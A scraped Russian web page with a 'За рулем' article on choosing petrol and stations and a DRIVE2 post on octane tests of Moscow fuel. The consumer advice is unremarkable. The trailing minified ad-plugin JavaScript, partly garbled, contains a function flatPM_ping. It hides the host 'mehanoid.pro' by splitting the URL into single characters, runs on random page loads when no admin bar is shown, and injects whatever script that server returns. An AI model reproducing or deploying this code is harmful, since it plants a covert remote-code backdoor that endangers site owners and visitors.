Старайтесь избегать заправок-двойников, раскрашенных «под фирму» и называющихся почти так же — например, РВ вместо ВР или ЛИКОЙЛ вместо ЛУКОЙЛ. Не все желто-зеленые АЗС относятся к ВР, а желто-красные — к Шеллу. И никогда не заливайте топливо, которое существенно (на несколько рублей) дешевле, чем на соседней фирменной АЗС: велик риск приобрести отвратительный бензин.

Октановое число

Требования к октановому числу бензина могут меняться от модели к модели даже среди машин одной марки. Производитель обязательно указывает этот параметр в руководстве по эксплуатации и часто дублирует данные на внутренней стороне лючка бензобака.

Бензин — жидкость, получаемая от перегонки каменного угля, растворяющая жировые и смолистые вещества.

В.И. Даль. Толковый словарь живого великорусского языка

Если инструкция рекомендует конкретное октановое число, следуйте этим указаниям. Но чаще производитель дает вилку: например, 92–95.

В этом случае можно использовать и тот и другой бензин, но 95‑й все же предпочтительнее, потому что 92‑й на поверку нередко оказывается 89‑м. Да и поедет машина на 95‑м чуть веселее, а аппетит мотора наверняка окажется скромнее.

Правда, разницу в ценах между этими сортами топлива компенсировать вряд ли удастся — заправляться 92‑м дешевле.

Что касается бензина с октановым числом 98, то его область применения — высокофорсированные, наддувные двигатели, требующие топлива с высокой детонационной стойкостью. Заливать 98‑й в обычный, атмосферный мотор просто незачем. Во‑первых, дорого.

Во‑вторых, никаких плюсов не почувствуешь. А вот минусы вполне возможны — к примеру, расход топлива может повыситься. Призывы бездумно заливать во все машины 98‑й, «потому что он лучше», оставим на совести маркетологов.

Тем, кому интересны нюансы, советуем перечитать наш материал «Деликатес для мотора» (ЗР, 2015, № 6).

А если в инструкции для машины с турбомотором указан интервал 95–98? В этом случае можно постоянно ездить на 95‑м, а 98‑й лить только в сильную жару. Дело в том, что с ростом температуры окружающей среды увеличивается вероятность возникновения детонации, поэтому высокооктановый бензин придется ко двору.

Экологический класс

Это еще один важный параметр, который надо учитывать при выборе бензина. Правило простое: чем выше экологический класс, тем бензин лучше. То есть если в ПТС указан третий экокласс, то заливать бензин четвертого класса абсолютно безопасно. А вот обратная замена допустима только как вынужденная мера. Правда, топливо класса ниже третьего сегодня продаваться не должно, а бензины четвертого и пятого классов отличаются друг от друга в основном количеством серы — 50 ppm против 10 ppm (ppm — пропромилле, или одна миллионная). Ее содержание ограничивают для того, чтобы продлить жизнь нейтрализатору, — а мотор разницы между этими бензинами практически не почувствует.

Если на топливораздаточной колонке АЗС класс вообще не указан, рисковать не стоит.

В крайнем случае, если бак пустой и заправки никак не избежать, не поленитесь попросить у оператора паспорт качества на топливо — там обязательно найдете информацию об экологическом классе бензина. И на чеке он должен быть указан (например, кл. 4).

Если вместо экологического класса на колонках красуется надпись Евро или вроде того, знайте — это рекламный ход, не имеющий отношения к реальным экологическим свойствам продаваемого топлива.

Если автомобиль рассчитан на 76‑й или 80‑й бензин, то смело заливайте 92‑й любого экологического класса. При этом желательно увеличить угол опережения зажигания: обладатели древних автомобилей умеют это делать.

Ultimate? Экто? V‑Power? G‑Drive?

Какой бензин предпочесть — обычный или «улучшенный»? Преимуществом фирменных бензинов является их повышенная моющая способность, способствующая удалению грязи из элементов системы питания (правда, моющие присадки должны присутствовать в любом бензине высокого класса, но кашу маслом не испортишь). Недостаток — более высокая цена.

Что касается обещаний прироста мощности, то это голословная, ничем не подтвержденная реклама. Положительный эффект возможен, но речь идет не о повышении мощности, а о ее восстановлении до паспортных значений после очищения грязного мотора.

Тем, кто долго ездил на обычном бензине и решил перейти на «моющее» топливо, рекомендую делать это постепенно. Сначала в бак, заполненный наполовину обычным топливом, добавьте бензин с моющей присадкой. Затем, выработав бак уже на три четверти, снова долейте улучшенный бензин. А потом заправляйтесь только им. Возможно, если загрязнения были сильными, придется поменять топливный фильтр.

И последнее

Если в безвыходной ситуации вам приходится заправляться на АЗС, где понятия не имеют о классах топлива и используют ржавые колонки и подтекающие пистолеты, то залейте минимум бензина, чтобы дотянуть до более цивилизованного места. А лучше не доводите до горящей лампочки резерва, если не знаете, где поблизости надежная заправка. Удачи и оптимизма!

Юрий Смитюк/ТАСС и «За рулем»

Источник: https://www.zr.ru/content/articles/852147-v-poiskax-goryuchego-benzin-i-azs-vybiraet-ekspert-za-rulem/

Тест бензина. Обновляемый пост. — DRIVE2

Внимание, это обновляемый пост. По договоренности с администрацией DRIVE2.ru в нем будут собраны тесты бензина в хронологическом порядке.==================================================================================

20 ноября 2017

Тест бензина АИ 95 Кутузовский. ОКТИС 2 vs лаборатория ГазпромнефтьСегодня необычный тест.

  • Получилось длинное видео, в котором вы можете увидеть, как именно и какими приборами измеряют октановое число бензина в лабораторных условиях.
  • Причем оборудование в передвижной лаборатории на порядок дороже чем оборудование в том же МАДИ, где ранее блоггеры выложили видео о несоотвествии показаний ОКТИС 2 реальным данным. Мы проверим

Сегодня мы сможем узнать насколько корректны показания ОКТИС 2. Многие говорили, что показания ОКТИС 2 годятся для гадания на кофейной гуще.Вот и сравним, что нам даст тест одних и тех образцов проб бензина АИ 95 в лабораторных условиях.

Сразу надо сказать, что в условиях промозглой осени точное оборудование, установленное в передвижной лаборатории Газпромнефти давало несколько раз сбои. Мы не стали это включать в видео, оно и так стало слишком длинным для массы зрителей, но про это наверно стоит написать.Хочется поблагодарить сотрудниц Газпромнефти Марину и Юлию за помощь в тестировании сразу 5 образцов бензина.

Надо отметить, что все тесты были слепыми, и сотрудники лаборатории не знали что за бензин находится в бутылках привезенных нами не испытания.

  1. Результаты тестирования вы найдете в конце видео.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++Ранее я выкладывал видео с тестом бензина, получившем большое количество отзывов и просмотров. Качество бензина, его марка, это ценник на бензин на АЗС, и мы все платим полновесным рублем за каждый литр топлива.

Что же льют Василии Алибабаевичи владельцы сетей АЗС в баки миллионов машин в Москве АЗС Лукойл, ТНК, ВР, Роснефть, Газпромнефть, Нефтьмагистраль?Как там Игорь Иванович Сечин? Неужели тоже шалит?

  • На примере моего Тропарево-Никулино, одного из лучших районов в Москве, я покажу, что льют в бак ведущие АЗС, и работает ли на них Василий Алибабаевич до сих пор?
  • Смотрим тест бензина АИ 95, на примере Тропарево-Никулино

АИ 95 стоит уже 40 рублей за литр, при этом мы как обычно кормим железного коня, на «дорогой» и «качественной» заправке, где пахнет кофе, и продают сосиски. То есть мы знаем где лучше самим пожрать, а что там льет в бак машины человек в зеленой униформе- не наша забота.

Ну -ну.

Россия ведущий нефтедобытчик в мире, при этом цена бензина у нас выше чем в США, не говоря о Саудовской Аравии, прочих нефтедобывающих странах.

На заправках нам пытались запретить съемку, вызывали полицию и службу безопасности, сигнал о проверке качества бензина в Тропарево-Никулино мгновенно разлетелся по всем заправкам района.

Тем кому нечго скрывать, не будет истерить когда идет проверка.

Государство фактически самоустранилось от контроля качества бензина, при этом более половины его цены- это налоги, которые мы платим каждый раз, вставляя пистолет в бензобак.И самое главное- мы все это терпим.

Источник: https://www.drive2.com/b/479562992644522554/

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};